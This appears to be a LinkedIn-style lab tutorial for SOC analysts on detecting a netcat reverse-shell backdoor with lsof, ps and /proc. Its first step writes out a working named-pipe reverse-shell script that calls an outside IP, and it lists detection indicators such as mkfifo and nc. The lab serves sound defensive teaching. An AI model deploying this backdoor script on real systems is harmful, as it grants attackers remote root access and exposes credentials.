Linux Backdoor Detection & Analysis Lab for Security Analysts & Incident Responders

Author: Venkata Naveen Kumar Prabhuleti

Program: Master’s in Cybersecurity Analytics & Operations @ Penn State

LinkedIn: linkedin.com/in/naveen-kumar-9b55a0154

Why This Lab?

This simple and hands-on Linux lab demonstrates how attackers can set up a reverse shell backdoor using netcat and how defenders can analyze it using core Linux commands. As a Blue Teamer or SOC Analyst, understanding such techniques helps in building better detection and incident response strategies - right from the terminal.

What You Will Learn

• How a reverse shell using nc works
• Detecting such shells using lsof, ps, /proc/<pid>
• Key forensic insights for real-time incident response
• No need for advanced tools - just native Linux CLI

Environment Setup

• Distro: Kali Linux (Cloud Install)

• Tools: nc, lsof, ps, strings, /proc filesystem

• Access: Root or sudo privileges

Step-by-Step Lab Walkthrough

Step 1: Create the Backdoor Script

#!/bin/bash
backpipe=/root/backpipe
rm -f $backpipe
mkfifo $backpipe
cat $backpipe | /bin/bash -i 2>&1 | nc 10.10.255.81 2222 > $backpipe        

Save this as backpipe, make it executable using chmod +x backpipe, and execute it with ./backpipe.

Step 2: Attacker Connects to the Backdoor

On the attacker side:

$ nc -lvp 2222        

You get full shell access with root privileges. Commands like whoami, ls, cd, cat /etc/shadow are all accessible.

Step 3: Analyze with lsof

Use lsof -i -P and lsof -p <PID> to detect open ports and connections.

$ lsof -i -P
$ lsof -p 1816  # Replace with actual PID of nc        

You’ll notice the nc process holding a TCP connection and referencing /root/backpipe.

Step 4: Inspect Process Tree

$ ps aux | grep nc        

Reveals the active reverse shell with command line args

Step 5: Deep Dive into /proc

$ cd /proc/1816
$ ls
$ strings ./exe | less        

You can inspect memory maps, file descriptors, environment variables, and binaries in use. The strings output shows that /bin/bash and nc were invoked through the script.

What This Lab Teaches

Realistic Threat Insight

This is a common stealthy persistence technique used in Linux-based infrastructures.

Defender Visibility

This lab gives hands-on exposure to:

• Detecting unauthorized remote shells
• Investigating abnormal TCP ports
• Inspecting named pipes used in covert channels
• Digging into live process artifacts via /proc

No Tools Needed

Forget heavy EDRs for simple analysis- this is raw and direct Linux forensics using just terminal commands.

Analyst Tips

Watch out for:

• Usage of mkfifo in bash scripts
• Long-running nc processes
• Unusual ports like 2222 open to unknown IPs
• Named pipes in /tmp/, /root/ being used

Combine this lab knowledge with log monitoring tools like Splunk, Syslog, or Wazuh for deeper threat correlation.

Get the Lab Files

GitHub-ready Lab:

You can download the full lab with Markdown, images, and documentation:

Download Linux_Backdoor_Analysis_Lab.zip

Let’s Connect

If you found this useful, please leave a reaction or comment and let’s discuss real-world reverse shell detection!

Connect with me: linkedin.com/in/naveen-kumar-9b55a0154

DM me if you want the raw lab files or need help setting up your sandbox.